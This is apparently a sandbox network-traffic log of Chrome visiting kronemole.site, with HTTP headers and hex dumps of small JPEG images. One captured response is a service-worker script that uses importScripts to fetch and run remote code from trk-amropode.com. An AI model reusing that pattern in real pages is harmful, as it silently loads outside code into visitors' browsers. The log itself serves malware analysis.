                                                                          2023-11-21 16:58:44 UTC728INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:44 UTC729INData Raw: 6e 64 6f 77 73 29 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 34 35 37 44 45 32 37 34 38 42 38 30 31 31 45 44 39 42 43 45 42 39 43 41 45 33 35 44 30 41 33 33 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 34 35 37 44 45 32 37 35 38 42 38 30 31 31 45 44 39 42 43 45 42 39 43 41 45 33 35 44 30 41 33 33 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 34 35 37 44 45 32 37 32 38 42 38 30 31 31 45 44 39 42 43 45 42 39 43 41 45 33 35 44 30 41 33 33 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 34 35 37 44 45 32 37 33 38 42 38 30 31 31 45 44 39 42 43 45 42
                                                                          Data Ascii: ndows)" xmpMM:InstanceID="xmp.iid:457DE2748B8011ED9BCEB9CAE35D0A33" xmpMM:DocumentID="xmp.did:457DE2758B8011ED9BCEB9CAE35D0A33"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:457DE2728B8011ED9BCEB9CAE35D0A33" stRef:documentID="xmp.did:457DE2738B8011ED9BCEB
                                                                          2023-11-21 16:58:44 UTC730INData Raw: b8 f7 c4 57 ba b4 5a 49 25 00 6d 09 8c 35 97 c4 75 64 66 49 09 02 5b 41 02 36 96 1a fc 66 0c 69 c3 ba 52 7d 66 97 dc 72 ec dc b0 42 6c 8e 62 79 70 d9 8c 11 47 ca fd 84 4f c0 9b 7b e6 ae bf f3 6a f3 39 11 75 df 74 50 f4 ef fc 85 47 91 7a af bb 67 cc 7a f7 41 04 4d 97 e3 ca 51 99 87 11 ce 3c d4 7e 69 1c 9e 5e de 6b c7 97 f8 71 ec 8d 7d 6b f6 a5 f9 9f a3 8f b5 04 11 af f6 6e 80 9f 5e f9 02 e7 ee 42 fe 55 71 e5 37 47 de 8e e6 b8 0e 1c be d4 10 46 9c 4f 0e 73 46 0b 1a 7f 66 08 20 86 c1 9f ff d9
                                                                          Data Ascii: WZI%m5udfI[A6fiR}frBlbypGO{j9utPGzgzAMQ<~i^kq}kn^BUq7GFOsFf


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.449776104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:43 UTC725OUTGET /service-worker.js HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          Accept: */*
                                                                          Service-Worker: script
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: same-origin
                                                                          Sec-Fetch-Dest: serviceworker
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:44 UTC736INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:44 GMT
                                                                          Content-Type: application/javascript
                                                                          Content-Length: 186
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:48:00 GMT
                                                                          last-modified: Mon, 22 May 2023 19:53:31 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: HIT
                                                                          Age: 644
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1tWCFeRPgjNPyWa4u%2Bne6VmqGc1X%2FJYeqDAXOMg90PMaIcCh6nwqLRAVzj9ZvdYkzA%2FZAWB2tbPCaj41MOmCq76Rh6Ujfyr1DAf0IKYwvihk%2BBUivmQRsGG9LAX8C%2BbArw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa988187001-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:44 UTC737INData Raw: 2f 2f 20 67 65 6e 65 72 61 6c 0a 69 66 28 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 7b 0a 20 20 20 20 20 20 20 20 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 2f 2f 73 63 72 69 70 74 73 2f 70 67 2f 76 39 65 31 31 38 6d 65 7a 38 27 29 0a 7d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 74 72 6b 2d 61 6d 72 6f 70 6f 64 65 2e 63 6f 6d 2f 2f 73 63 72 69 70 74 73 2f 73 77 2f 76 39 65 31 31 38 6d 65 7a 38 27 29 3b
                                                                          Data Ascii: // generalif(typeof window === 'undefined'){ importScripts('https://trk-amropode.com//scripts/pg/v9e118mez8')}importScripts('https://trk-amropode.com//scripts/sw/v9e118mez8');


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.449777172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:43 UTC726OUTGET /fim/3079-US/cbc458c2f5038386fc23f670d1cc7242.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:44 UTC740INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:44 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 1993
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:44 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:47:44 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MMyFHdLc%2Fy6R3HEeitMgAkCp0avp7PKPZrtNMN5V%2FgfXvSebg7XdoPtfuswWirGNgtKiH7rS8WN0xeVzprbAamncNLIAwVvMXe8TEo%2F8ma4BWddTXiHsclDrvRRiMbD7Rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa99b38082f-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:44 UTC741INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:44 UTC741INData Raw: 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 31 45 31 34 45 44 31 36 38 42 38 30 31 31 45 44 42 46 37 45 43 30 38 37 34 31 45 39 36 33 36 46 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 31 45 31 34 45 44 31 37 38 42 38 30 31 31 45 44 42 46 37 45 43 30 38 37 34 31 45 39 36 33 36 46 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 31 45 31 34 45 44 31 34 38 42 38 30 31 31 45 44 42 46 37 45 43 30 38 37 34 31 45 39 36 33 36 46 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 31 45 31 34 45 44 31 35 38 42 38 30 31 31 45 44 42 46 37 45 43 30 38 37 34 31 45 39 36 33 36 46 22 2f
                                                                          Data Ascii: :InstanceID="xmp.iid:1E14ED168B8011EDBF7EC08741E9636F" xmpMM:DocumentID="xmp.did:1E14ED178B8011EDBF7EC08741E9636F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E14ED148B8011EDBF7EC08741E9636F" stRef:documentID="xmp.did:1E14ED158B8011EDBF7EC08741E9636F"/
                                                                          2023-11-21 16:58:44 UTC743INData Raw: 77 84 ee df 4a 4f e0 4d db bd af 1f aa 8a 2b 90 a3 4d 27 f5 e3 c5 f8 3f d5 4c 6b 7f ab 8f ef 3c 07 c7 bb f0 fb f8 d1 45 70 fc d0 fb 3f 1b f7 26 37 de 47 bf c5 db e8 3f 1d 6b 27 85 3d 27 e4 a2 8a 61 38 a7 c1 e0 fe 3d 54 51 45 63 1f ff d9
                                                                          Data Ascii: wJOM+M'?Lk<Ep?&7G?k'='a8=TQEc


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.449778172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:43 UTC726OUTGET /fim/3079-US/c269e80114f9dc475a93e1d2e924e5f4.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:44 UTC737INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:44 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 1998
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:48:53 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:48:52 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: HIT
                                                                          Age: 591
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x%2BeaScBInQC8DVbwYzN1uYd8zSZZUfTSaSB0f0GS7LRumtoETxfU4RKuWEJ8ObKNGPjDIFzx7wH2I3ghe4oeaxnWq%2BG9%2FONvgndLnY3XJicsdE50143FajK4%2FXLeHsi7bQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aaa1ad2591a-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:44 UTC738INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:44 UTC738INData Raw: 6f 77 73 29 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 35 39 45 38 45 39 31 33 38 42 37 46 31 31 45 44 38 34 41 44 39 34 43 33 43 36 45 38 30 34 41 31 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 35 39 45 38 45 39 31 34 38 42 37 46 31 31 45 44 38 34 41 44 39 34 43 33 43 36 45 38 30 34 41 31 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 35 39 45 38 45 39 31 31 38 42 37 46 31 31 45 44 38 34 41 44 39 34 43 33 43 36 45 38 30 34 41 31 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 35 39 45 38 45 39 31 32 38 42 37 46 31 31 45 44 38 34 41 44 39 34 43
                                                                          Data Ascii: ows)" xmpMM:InstanceID="xmp.iid:59E8E9138B7F11ED84AD94C3C6E804A1" xmpMM:DocumentID="xmp.did:59E8E9148B7F11ED84AD94C3C6E804A1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:59E8E9118B7F11ED84AD94C3C6E804A1" stRef:documentID="xmp.did:59E8E9128B7F11ED84AD94C
                                                                          2023-11-21 16:58:44 UTC739INData Raw: 3c 5d 39 ef fe 1e ca 2a b6 16 e6 d3 ca bb 83 5e 5a fe aa c9 e4 ff 00 e9 e4 ff 00 b0 74 ed 34 51 58 b1 ea fb 1a 3a 93 f2 ff 00 c5 6e de 7d b4 eb 99 a2 8a e8 60 fa be e6 1f d3 f7 5d 88 c9 f8 67 b3 d9 49 f3 3f b9 8f 5e 5d dd 74 e7 45 14 33 6c 1f cd b8 bf dd de f4 f6 51 45 15 23 41 ff d9
                                                                          Data Ascii: <]9*^Zt4QX:n}`]gI?^]tE3lQE#A


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.449780172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:44 UTC727OUTGET /fim/3079-US/4472ed6a36bdd245e7f6835e6e29df47.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:44 UTC747INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:44 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 2003
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:44 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:47:42 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4mlPjjdhZm56EvLqdBxm62CVOo9JQ0x882sQxmPnFB4MZYRK5jmfGNpcftPpswwzjYrr76y1mCkpe3F7bhD%2BiZWHLiI7mua8Ys%2FXaP%2BHIAHz8nEI0OO7zZr8PK3y6Aplg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aaa4952700a-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:44 UTC747INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 37 39 2e 31 37 31 63 32 37 66 61 62 2c 20 32 30 32 32 2f 30 38 2f 31 36 2d 32 32 3a 33 35 3a 34 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF
                                                                          2023-11-21 16:58:44 UTC748INData Raw: 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 46 42 38 32 46 36 43 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 46 42 38 32 46 36 44 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 37 46 42 38 32 46 36 41 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 37 46 42 38 32 46 36 42 38 42 37 46 31 31 45 44 38 44 43 44 44 42 42 42 46 39 34 46 35 31 30 34 22 2f
                                                                          Data Ascii: :InstanceID="xmp.iid:7FB82F6C8B7F11ED8DCDDBBBF94F5104" xmpMM:DocumentID="xmp.did:7FB82F6D8B7F11ED8DCDDBBBF94F5104"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7FB82F6A8B7F11ED8DCDDBBBF94F5104" stRef:documentID="xmp.did:7FB82F6B8B7F11ED8DCDDBBBF94F5104"/
                                                                          2023-11-21 16:58:44 UTC749INData Raw: ae ea c6 ea bf 7f 3f 37 3a f3 72 f9 bb e8 a2 9e f8 3c f1 c9 83 36 93 6b a0 f9 3e 17 af 46 c3 ff 00 9b 8f f8 2b cb fc 23 e2 ec a2 8a e8 ea 6d f0 8c 1f d5 5f 75 87 cb f7 af f8 9c bb bb bb 6a 8a 7f ce 3a e8 35 d3 cd 45 15 9e c3 7d 65 4f cc e5 f8 7f 2d 14 51 42 29 ff d9
                                                                          Data Ascii: ?7:r<6k>F+#m_uj:5E}eO-QB)


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.449779172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:44 UTC727OUTGET /fim/3079-US/ec7283e9871151e7212a3f1c25ef4e43.jpg HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:44 UTC744INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:44 GMT
                                                                          Content-Type: image/jpeg
                                                                          Content-Length: 1821
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:44 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:51:47 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8ctWyxPZKoPaEIbRbsmTKf6rhx6xtemeLCpH%2FbF9fjHKvV0mqAbjXh22fyS119r5OBNLU0nzgorz1IJKfKkOHt60vNRlTBtQK0v7nMABEnL8Jk3RbIx%2FVHLR1TVshuBgug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aaa3e7b3970-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:44 UTC745INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 1f 43 6f 6d 70 72 65 73 73 65 64 20 62 79 20 6a 70 65 67 2d 72 65 63 6f 6d 70 72 65 73 73 ff db 00 84 00 04 04 04 04 04 04 04 04 04 04 06 06 05 06 06 08 07 07 07 07 08 0c 09 09 09 09 09 0c 13 0c 0e 0c 0c 0e 0c 13 11 14 10 0f 10 14 11 1e 17 15 15 17 1e 22 1d 1b 1d 22 2a 25 25 2a 34 32 34 44 44 5c 01 04 04 04 04 04 04 04 04 04 04 06 06 05 06 06 08 07 07 07 07 08 0c 09 09 09 09 09 0c 13 0c 0e 0c 0c 0e 0c 13 11 14 10 0f 10 14 11 1e 17 15 15 17 1e 22 1d 1b 1d 22 2a 25 25 2a 34 32 34 44 44 5c ff c2 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 03 01 00 02 03 00 00 00 00 00 00 00 00 00 00 06 07 08 05 03 09 01 02 04 ff da 00 08 01 01 00 00 00 00 f7 3c ca 5c 7c 1b 85 4b aa
                                                                          Data Ascii: JFIFCompressed by jpeg-recompress""*%%*424DD\""*%%*424DD\22"<\|K
                                                                          2023-11-21 16:58:44 UTC745INData Raw: 7d 09 67 c3 d3 a1 d8 e7 b7 b9 31 aa 23 ec e4 a4 46 60 00 48 c6 de af 49 88 a6 2b c7 db ad 9d 8d 6f b1 9b 86 60 91 32 31 3c d0 fc 18 45 42 9e d4 88 bc 4c ff 00 a7 0c eb 28 73 9c 1d f4 b2 75 d6 5e 08 78 74 77 de 82 ae cb 70 61 30 60 d5 d1 05 c4 69 12 98 75 21 49 2d 29 5a 65 bd b9 31 5d d3 75 87 89 42 d1 4d 45 81 09 3b 1c 11 e7 81 0f 43 5a 69 2f 75 ca d2 67 1b 51 96 4f 05 27 59 2b 38 19 81 b7 91 d1 47 40 8b 9b 40 d6 d5 34 9e 85 3f 26 4c 55 cd 93 14 c8 10 43 03 90 36 e7 89 1e 6b 14 7b 11 98 bb 77 e0 d6 5d b4 34 25 bb cc 6e c6 59 c9 98 ff 00 ea 70 7f e0 03 ce 85 ed 5a f6 6f f9 8c fd c6 f2 ed ee 72 bf 0f ff c4 00 37 10 00 02 01 03 02 03 03 0a 03 09 00 00 00 00 00 00 01 02 03 04 11 12 00 21 05 22 52 13 31 32 10 14 23 41 42 51 62 71 b2 d2 06 94 a1 24 53 54 61 72
                                                                          Data Ascii: }g1#F`HI+o`21<EBL(su^xtwpa0`iu!I-)Ze1]uBME;CZi/ugQO'Y+8G@@4?&LUC6k{w]4%nYpZor7!"R12#ABQbq$STar


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
